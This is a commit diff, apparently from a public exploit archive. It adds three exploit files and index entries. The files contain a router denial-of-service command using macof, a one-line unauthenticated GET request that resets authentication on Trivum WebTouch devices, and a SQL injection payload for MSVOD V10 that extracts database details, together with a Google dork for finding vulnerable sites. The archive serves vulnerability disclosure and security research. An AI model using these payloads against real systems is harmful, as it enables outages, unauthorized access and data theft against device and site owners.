DB: 2018-07-21
3 changes to exploits/shellcodes TP-Link TL-WR840N - Denial of Service WordPress Plugin All In One Favicon 4.6 - Cross-Site Scripting WordPress Plugin All In One Favicon 4.6 - (Authenticated) Cross-Site Scripting MSVOD 10 - 'cid' SQL Injection Touchpad / Trivum WebTouch Setup 2.53 build 13163 - Authentication Bypass
This commit is contained in:
Offensive Security
parent
bf0a56a02f
commit
350bb348ff
4 changed files with 68 additions and 1 deletions
20
exploits/hardware/dos/45064.txt
Normal file
20
exploits/hardware/dos/45064.txt
Normal file
|
|
@ -0,0 +1,20 @@
|
||||||
|
# Exploit Title:- TP-Link Wireless N Router WR840N - Buffer Overflow
|
||||||
|
# Date:- 2018-07-16
|
||||||
|
# Vendor Homepage:- https://www.tp-link.com/
|
||||||
|
# Hardware Link:- https://www.amazon.in/TP-LINK-TL-WR840N-300Mbps-Wireless-External/dp/B01A0G1J7Q
|
||||||
|
# Version:- TP-Link Wireless N Router WR840N
|
||||||
|
# Category:- Hardware
|
||||||
|
# Exploit Author:- Aniket Dinda
|
||||||
|
# Tested on:- Linux
|
||||||
|
# CVE:- CVE-2018-14336
|
||||||
|
|
||||||
|
**********************************************************************************************************
|
||||||
|
Proof Of Concept:-
|
||||||
|
|
||||||
|
1- First connect to this network
|
||||||
|
2- Open terminal => And Type "macof -i eth0 -n 10"
|
||||||
|
3- Hit Enter
|
||||||
|
4- You will see that your Net connection will lost.
|
||||||
|
******************************************************************************************************
|
||||||
|
Solutions:
|
||||||
|
1- You have to Reboot your router .
|
||||||
33
exploits/hardware/webapps/45063.txt
Normal file
33
exploits/hardware/webapps/45063.txt
Normal file
|
|
@ -0,0 +1,33 @@
|
||||||
|
# Exploit Title: Touchpad / Trivum WebTouch Setup V9 V2.53 build 13163 - Unauthorized Authentication Reset
|
||||||
|
|
||||||
|
# Date: 2018-07-20
|
||||||
|
|
||||||
|
# Software Link: https://world.trivum-shop.de
|
||||||
|
|
||||||
|
# Version: < 2.56 build 13381 - 12-07-2018
|
||||||
|
|
||||||
|
# Category: webapps
|
||||||
|
|
||||||
|
# Tested on:
|
||||||
|
|
||||||
|
Touchpad / Trivum WebTouch Setup V9 V2.53 build 13163 of Apr 6 2018 09:10:14 (FW 303)
|
||||||
|
|
||||||
|
# Exploit Author: vulnc0d3
|
||||||
|
|
||||||
|
# Contact: http://twitter.com/HerwonoWr
|
||||||
|
|
||||||
|
# CVE: CVE-2018-13862
|
||||||
|
|
||||||
|
1. Description
|
||||||
|
|
||||||
|
Touchpad / Trivum WebTouch Setup V9 V2.53 build 13163 of Apr 6 2018 09:10:14 (FW 303) before 2.56 build 13381 - 12.07.2018, allow unauthorized remote attackers to reset the authentication via "/xml/system/setAttribute.xml" URL, using GET request to the end-point "?id=0&attr=protectAccess&newValue=0" (successful attack will allow attackers to login without authorization).
|
||||||
|
|
||||||
|
2. Proof of Concept
|
||||||
|
|
||||||
|
# GET Request
|
||||||
|
|
||||||
|
http://target/xml/system/setAttribute.xml?id=0&attr=protectAccess&newValue=0
|
||||||
|
|
||||||
|
3. Vendor Changes Log
|
||||||
|
|
||||||
|
# http://update.trivum.com/update/tp9-changes.html
|
||||||
11
exploits/php/webapps/45062.txt
Normal file
11
exploits/php/webapps/45062.txt
Normal file
|
|
@ -0,0 +1,11 @@
|
||||||
|
# Exploit Title: MSVOD V10 ¡V SQL Injection
|
||||||
|
# Google Dork: inurl:"images/lists?cid=13"
|
||||||
|
# Date: 2018/07/17
|
||||||
|
# Exploit Author: Hzllaga
|
||||||
|
# Vendor Homepage: http://www.msvod.cc/
|
||||||
|
# Version: MSVOD V10
|
||||||
|
# CVE : CVE-2018-14418
|
||||||
|
#Reference : https://www.wtfsec.org/2583/msvod-v10-sql-injection/
|
||||||
|
|
||||||
|
Payload:
|
||||||
|
/images/lists?cid=13%20)%20ORDER%20BY%201%20desc,extractvalue(rand(),concat(0x7c,database(),0x7c,user(),0x7c,@@version))%20desc%20--%20
|
||||||
|
|
@ -6022,6 +6022,7 @@ id,file,description,date,author,type,platform,port
|
||||||
45059,exploits/multiple/dos/45059.txt,"Google Chrome - Swiftshader Texture Allocation Integer Overflow",2018-07-19,"Google Security Research",dos,multiple,
|
45059,exploits/multiple/dos/45059.txt,"Google Chrome - Swiftshader Texture Allocation Integer Overflow",2018-07-19,"Google Security Research",dos,multiple,
|
||||||
45060,exploits/multiple/dos/45060.html,"Google Chrome - Swiftshader Blitting Floating-Point Precision Errors",2018-07-19,"Google Security Research",dos,multiple,
|
45060,exploits/multiple/dos/45060.html,"Google Chrome - Swiftshader Blitting Floating-Point Precision Errors",2018-07-19,"Google Security Research",dos,multiple,
|
||||||
45061,exploits/multiple/dos/45061.html,"Google Chrome - SwiftShader OpenGL Texture Bindings Reference Count Leak",2018-07-19,"Google Security Research",dos,multiple,
|
45061,exploits/multiple/dos/45061.html,"Google Chrome - SwiftShader OpenGL Texture Bindings Reference Count Leak",2018-07-19,"Google Security Research",dos,multiple,
|
||||||
|
45064,exploits/hardware/dos/45064.txt,"TP-Link TL-WR840N - Denial of Service",2018-07-20,"Aniket Dinda",dos,hardware,
|
||||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||||
|
|
@ -39686,6 +39687,8 @@ id,file,description,date,author,type,platform,port
|
||||||
45049,exploits/php/webapps/45049.txt,"Smart SMS & Email Manager 3.3 - 'contact_type_id' SQL Injection",2018-07-18,AkkuS,webapps,php,80
|
45049,exploits/php/webapps/45049.txt,"Smart SMS & Email Manager 3.3 - 'contact_type_id' SQL Injection",2018-07-18,AkkuS,webapps,php,80
|
||||||
45053,exploits/multiple/webapps/45053.txt,"Open-AudIT Community 2.1.1 - Cross-Site Scripting",2018-07-18,"Ranjeet Jaiswal",webapps,multiple,
|
45053,exploits/multiple/webapps/45053.txt,"Open-AudIT Community 2.1.1 - Cross-Site Scripting",2018-07-18,"Ranjeet Jaiswal",webapps,multiple,
|
||||||
45054,exploits/php/webapps/45054.txt,"FTP2FTP 1.0 - Arbitrary File Download",2018-07-18,AkkuS,webapps,php,
|
45054,exploits/php/webapps/45054.txt,"FTP2FTP 1.0 - Arbitrary File Download",2018-07-18,AkkuS,webapps,php,
|
||||||
45056,exploits/php/webapps/45056.txt,"WordPress Plugin All In One Favicon 4.6 - Cross-Site Scripting",2018-07-19,"Javier Olmedo",webapps,php,80
|
45056,exploits/php/webapps/45056.txt,"WordPress Plugin All In One Favicon 4.6 - (Authenticated) Cross-Site Scripting",2018-07-19,"Javier Olmedo",webapps,php,80
|
||||||
45055,exploits/php/webapps/45055.py,"Modx Revolution < 2.6.4 - Remote Code Execution",2018-07-18,"Vitalii Rudnykh",webapps,php,
|
45055,exploits/php/webapps/45055.py,"Modx Revolution < 2.6.4 - Remote Code Execution",2018-07-18,"Vitalii Rudnykh",webapps,php,
|
||||||
45057,exploits/php/webapps/45057.txt,"MyBB New Threads Plugin 1.1 - Cross-Site Scripting",2018-07-19,0xB9,webapps,php,80
|
45057,exploits/php/webapps/45057.txt,"MyBB New Threads Plugin 1.1 - Cross-Site Scripting",2018-07-19,0xB9,webapps,php,80
|
||||||
|
45062,exploits/php/webapps/45062.txt,"MSVOD 10 - 'cid' SQL Injection",2018-07-20,Hzllaga,webapps,php,
|
||||||
|
45063,exploits/hardware/webapps/45063.txt,"Touchpad / Trivum WebTouch Setup 2.53 build 13163 - Authentication Bypass",2018-07-20,vulnc0d3,webapps,hardware,
|
||||||
|
|
|
||||||
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue